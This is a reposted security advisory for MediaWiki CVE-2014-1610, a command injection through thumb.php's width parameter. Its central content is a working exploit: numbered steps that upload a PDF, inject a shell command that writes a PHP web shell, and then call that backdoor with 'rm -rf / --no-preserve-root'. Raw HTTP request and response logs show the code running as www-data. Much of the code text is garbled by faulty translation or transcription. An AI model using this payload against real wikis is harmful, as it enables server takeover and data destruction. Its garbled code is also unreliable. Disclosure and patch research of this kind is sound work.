Multiple Remote Code Execution Vulnerabilities in MediaWiki

Source: Internet
Author: User
Tags webp mediawiki

Multiple Remote Code Execution Vulnerabilities in MediaWiki

Release date:
Updated on:

Affected Systems:
MediaWiki <= 1.22.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65223
CVE (CAN) ID: CVE-2014-1610

MediaWiki is a famous wiki program running in the PHP + MySQL environment.

MediaWiki 1.22.2, 1.21.5, 1.19.11, and earlier versions enable support for DjVu or PDF File Upload, allowing remote attackers to use the supported des/media/DjVu. shell metacharacters and thumb in the page parameter in php. the shell metacharacters in the w parameter in php, And the deldes/media/Bitmap. parameters in php, uplodes/media/ImageHandler. attackers can exploit this vulnerability to execute arbitrary commands in php.

<* Source: Netanel Rubin

Link: http://secunia.com/advisories/56695
Http://www.exploit-db.com/exploits/31329/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

----- Begin pgp signed message -----
Hash: SHA1

######################################## ############################
#
# MediaWiki <= 1.22.1 unzip Handler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin-Check Point's Vulnerability Research Group (Jan 19,201 4)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30,201 4)
# Affected website: Wikipedia.org and more!
#
# Exploit author: Xelenonz & @ u0x (Pichaya Morimoto)
# Release dates: Feb 1, 2014
# Special Thanks to 2600 Thailand!
#
######################################## ############################

# Exploit:
######################################## ############################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
Http: // vulnerable-site/index. php/Special: Upload
2. inject OS cmd to upload a php-backdoor
Http: // vulnerable-site/thumb. php? F=Longcat.pdf & w = 10 | 'echo % 20
"<? Php % 20 system (\ $ _ GET [1]); "> images/xnz. php'
3. access to php-backdoor!
Http: // vulnerable-site/images/xnz. php? 1 = rm % 20-rf % 20% 2f % 20 -- no-preserve-root
4. happy pwning !!


# Related files:
######################################## ############################
Thumb. php <-- extract all _ GET array to params
/Extensions/login handler/login handler_body.php <-- failed to escape w/width
Options
/Uplodes/media/ImageHandler. php
/Shortdes/GlobalFunctions. php
/Shortdes/filerepo/file/File. php

# Vulnerability Analysis:
######################################## ############################
1. thumb. php
This script used to resize images if it is configured to be done
When the web browser requests the image
<? ...
1.1 Called directly, use $ _ GET params
WfThumbHandleRequest ();
1.2 Handle a thumbnail request via query parameters
Function wfThumbHandleRequest (){
$ Params = get_magic_quotes_gpc ()
? Array_map ('stripslashes', $ _ GET)
: $ _ GET; <WTF

WfStreamThumb ($ params); // stream the thumbnail
}
1.3 Stream a thumbnail specified by parameters
Function wfStreamThumb (array $ params ){
...
$ FileName = isset ($ params ['F'])? $ Params ['F']: ''; // <puts
Uploaded.pdf file here
...
// Backwards compatibility parameters
If (isset ($ params ['W']) {
$ Params ['width'] = $ params ['W']; // <Inject OS cmd here!
Unset ($ params ['W']);
}
...
$ Img = wfLocalFile ($ fileName );
...
// Thumbnail isn't already there, so create the new thumbnail...
$ Thumb = $ img-> transform ($ params, File: RENDER_NOW); // <resize image
By width/height
...
// Stream the file if there were no errors
$ Thumb-> streamFile ($ headers );
...
?>
2./shortdes/filerepo/file/File. php
<? ...
Function transform ($ params, $ flags = 0 ){...
$ Handler = $ this-> getHandler (); // <PDF Handler
...
$ NormalisedParams = $ params;
$ Handler-> normaliseParams ($ this, $ normalisedParams );
...
$ Thumb = $ handler-> doTransform ($ this, $ tmpThumbPath, $ thumbUrl, $ params );
..
?>
3./extensions/export handler/export handler_body.php
<? ...
Function doTransform ($ image, $ dstPath, $ dstUrl, $ params, $ flags = 0 ){
...
$ Width = $ params ['width'];
...
$ Cmd = '('. wfEscapeShellArg ($ wg1_processor); // <craft shell cmd &
Parameters
$ Cmd. = "-sDEVICE = jpeg-sOutputFile =-dFirstPage = {$ page}
-DLastPage = {$ page }";
$ Cmd. = "-r {$ wg‑handlerdpi}-dBATCH-dNOPAUSE-q". wfEscapeShellArg (
$ SrcPath );
$ Cmd. = "|". wfEscapeShellArg ($ wg1_postprocessor );
$ Cmd. = "-depth 8-resize {$ width}-"; // <FAILED to escape shell
Argument
$ Cmd. = wfEscapeShellArg ($ dstPath ).")";
$ Cmd. = "2> & 1 ";
...
$ Err = wfShellExec ($ cmd, $ retval );
...
?>
4./shortdes/GlobalFunctions. php
Execute a shell command, with time and memory limits
<? ...
Function wfShellExec ($ cmd, & $ retval = null, $ environ = array (), $ limits =
Array ()){
...
Passthru ($ cmd, $ retval); // <Execute here !!

# Proof-Of-Concept
######################################## ############################
GET/mediawiki1221/thumb. php? F=longcat.pdf & w = 10 | 'echo % 20% 22% 3C
Php % 20 system (\ $ _ GET [1]); % 22% 3 Eimages/longcat. php'
HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
Text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp, */*; q = 0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US, en; q = 0.8
Cookie: my_wikiUserID = 2; my_wikiUserName = Longcat;
My_wiki_session = op3h2huvddnmg7gji0pscfsg02

<Html> <Body>
<H1> Error generating thumbnail <P>
& #3648; & #3585; & #3636; & #3604; & #3611; & #3633; & #3597; & #3627; & #3634; & #3652; & #3617; & #3656; & #3626; & #3634; & #3617; & #3634; & #3619; & #3606; & #3607; & #3635; & #3619; & #3641; & #3611; & #3618; & #3656; & #3629; & #3652; & #3604; & #3657 ;: /bin/bash:-: command not found <br/>
Convert: option requires an argument '-resize '@
Error/convert. c/ConvertImageCommand/2380. <br/>
GPL Ghostscript 9.10: Unrecoverable error, exit code 1 <br/>

</P>

</Body>
</Html>


GET/mediawiki1221/images/longcat. php? 1 = id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
Text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp, */*; q = 0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US, en; q = 0.8
Cookie: my_wikiLoggedOut = 1391266363; my_wikiUserID = 2;
My_wikiUserName = Longcat; my_wiki_session = bv1_n4o0sn6ug04lg26luqfcg1

Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)


# Back-end $ cmd
######################################## ############################
GlobalFunctions. php: wfShellExec ()
Cmd = ('gs '-sDEVICE = jpeg-sOutputFile =--dFirstPage = 1-dLastPage = 1-r150
-DBATCH-dNOPAUSE-q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/Usr/bin/convert'-depth 8-resize 10 | 'echo "<? Php
System (\ $ _ GET [1]); "> images/longcat. php '-
'/Tmp/transform_0e377aad0e27-1.jpg') 2> & 1

----- Begin pgp signature -----
Version: GnuPG v1.4.14 (GNU/Linux)

Iqicbaebagbqjs7sllaaojeb2khapd1xmu8bcp/A + hMUw/EDwChN + 2 XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
Ny9Xg7o4WtMgmSvSOOc + lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
MijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c + jjz74SR // SlQPrqDbvEpj2
UCCpTpjf6LGYCzyGmqROlf + OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
Bytes
Bytes
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO +/yjzuybxybhrjserd4l1_wuyr/WPAQt
VuICIQyO5pcjkIib + 0DN4e7xcFMYuo3o6WkSZuZT + l0LwYDVmhUbaGAEP13 + dWZZ
Bytes
KumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
= OoEs
----- End pgp signature -----

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

MediaWiki
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://wikipedia.sourceforge.net/
Http://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html
Https://www.mediawiki.org/wiki/Release_notes/1.22
Https://www.mediawiki.org/wiki/Release_notes/1.21
Https://www.mediawiki.org/wiki/Release_notes/1.19

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.